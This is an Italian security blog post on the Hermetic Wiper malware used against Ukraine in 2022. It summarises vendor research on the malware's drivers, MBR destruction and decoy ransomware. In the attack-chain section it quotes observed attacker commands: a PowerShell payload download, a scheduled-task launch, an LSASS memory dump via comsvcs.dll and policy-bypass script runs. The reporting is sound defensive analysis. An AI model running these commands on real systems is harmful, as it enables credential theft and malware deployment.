venerdì 25 febbraio 2022
Hermetic Wiper, il malware usato contro l'Ucraina è già arrivato in Italia. Ha un solo scopo: distruggere.
C'è una guerra nella guerra, o forse sarebbe meglio dire che c'è un nuovo aspetto della guerra, meno visibile ma comunque molto devastante. E' la cyber war ed è l'aspetto forse meno raccontato di questo conflitto in Ucraina.
L'ingresso delle truppe russe in Ucraina è stato anticipato da una pesante giornata di attacchi informatici: i classici DDoS contro siti governativi e i principali istituti bancari del paese, ma non solo. Dalla giornata di mercoledì l'Ucraina è stata investita da una massiva diffusione di un nuovo malware: i ricercatori di sicurezza lo hanno ribattezzato Hermetic Wiper.
Hermetic Wiper: una prima presentazione
Hemertic Wiper è una nuova famiglia di wiper, cioè malware pensati per cancellare tutte le informazioni presenti sui supporti di memoria presenti nelle macchine bersaglio. Si presenta sotto forma di eseguibile che è addirittura firmato con un certificato valido di Hermetica Digital Ltd.
Fonte: ESET
L'eseguibile contiene file driver in 32-bit e 64-bit in forma compressa.
Fonte: Bleeping Computer
I file driver del malware sono firmati con certificato di CHENGDU YIWO Tech Development Co, l'azienda che ha sviluppato EaseUS Partition Master.
Fonte: ESET
Una volta eseguito il malware, questo procede ad installare uno di questi driver come un nuovo Servizio di Windows.
Fonte. Bleeping Computer
Le stringhe entro i driver provengono dal programma Easus Partition Manager.
Disk
\Device\Harddisk%u\Partition0
\Device\EPMNTDRV
\DosDevices\EPMNTDRV
Tra le prime azioni del malware c'è quella di danneggiare l'MBR sulle macchine infette. Di fatto Hermetic Wiper non ha bisogno di molte funzionalità: è un malware distruttivo, pensato solo per distruggere. Danneggiare l'MBR conduce ad un solo possibile risultato: la macchina bersaglio non sarà in grado di avviarsi. La particolarità è che l'MBR viene danneggiato prima del riavvio.
E' stato distribuito in Ucraina qualche ora prima dello scoppio armato del conflitto, ma alcune tracce dell'attività del malware sono state trovate anche in Lituania e Lettonia. Dopo appena 3 giorni è già arrivato in Italia
La catena di attacco (per quanto ad ora è possibile sapere)
Ad ora non è chiaro come Hermetic Wiper si diffonda: nel caso dell'attacco contro le istituzioni ucraine, si sa che questo è stato preparato per mesi. Secondo alcuni ricercatori infatti le prime attività potenzialmente dannose risalirebbero addirittura al Novembre 2021. Una delle infezioni, analizzate dai ricercatori di Symantec, sembra risalire al 23 Dicembre 2021: le reti di una organizzazione governativa ucraina sono state violate, in quel caso, sfruttando vulnerabilità dell'SMB di un server Microsoft Exchange. Ci sono tracce evidenti di furto di credenziali conseguenti a questo breach. In quella rete risulta installata, in data 16 gennaio, anche una web shell che ha anticipato la distribuzione del wiper, iniziata appunto il 23 Febbraio.
Secondo ESET invece il malware ha, come data di compilazione, il 28 Dicembre 2021 ritenuta la data reale in cui è stato pianificato l'attacco.
Un altro caso analizzato è stata l'infezione di un'azienda Lituana: anche in questo caso la compromissione della rete risale già al Novembre 2021. Pare che l'accesso sia stato ottenuto usando un exploit di Tomcat, tramite il quale è stato eseguito un comando PowerShell. Questo comando è stato usato per scaricare un file JPEG sulla rete bersaglio.
Questo il PowerShell deoffuscato utilizzato per scaricare il file JPEG sulla rete bersaglio:
cmd.exe /Q /c powershell -c "(New-Object System.Net.WebClient).DownloadFile('hxxp://192.168.3.13/email.jpeg','CSIDL_SYSTEM_DRIVE\temp\sys.tmp1')" 1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1
Poco dopo è stato creata una task per eseguire un file ‘postgresql.exe’, con i seguenti comandi:
cmd.exe /Q /c move CSIDL_SYSTEM_DRIVE\temp\sys.tmp1 CSIDL_WINDOWS\policydefinitions\postgresql.exe 1> \\127.0.0.1\ADMIN$\__1636727589.6007507 2>&1
schtasks /run /tn "\Microsoft\Windows\termsrv\licensing\TlsAccess"
Nell'analisi dei ricercatori Symantec, questo file postgresql.exe è stato usato per:
eseguire "certutil" per verificare la connettività verso trustsecpro[.]com e whatismyip[.]com;
eseguire un comando PowerShell per scaricare un ulteriore file JPEG da un web server precedentemente compromesso.
Nello stadio successivo il malware ha sfruttato PowerShell per il dump delle credenziali dalle macchine compromesse:
cmd.exe /Q /c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump 600 C:\asm\appdata\local\microsoft\windows\winupd.log full" 1> \\127.0.0.1\ADMIN$\__1638457529.1247072 2>&1
E' da questo momento che iniziano ad essere eseguiti molteplici script PowerShell sconosciuti:
powershell -v 2 -exec bypass -File text.ps1
powershell -exec bypass gp.ps1
powershell -exec bypass -File link.ps1
A distanza di 5 minuti, viene scaricato e attivato Hermetic Wiper: sono quindi eseguite le attività di wiping delle memorie presenti sulla macchina.
Un ransomware usato come diversivo per gli attacchi di wiping
In alcuni casi Hermetic Wiper è stato accompagnato da un ransomware: anzi sarebbe più corretto dire che il wiper utilizza come diversivo un nuovo ransomware scritto in linguaggio GoLang. Sempre secondo i ricercatori di Symantec
"è come se l'attacco ransomware sia stato usato come esca o come diversivo rispetto all'attacco di wiping. Questa cosa è molto simile al recente attacco wiper chiamao WhisperGate, anche questo avvenuto contro l'Ucraina. In quel caso il wiper era camuffato da ransomware"
Fonte: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Nell'immagine sotto la nota di riscatto fake: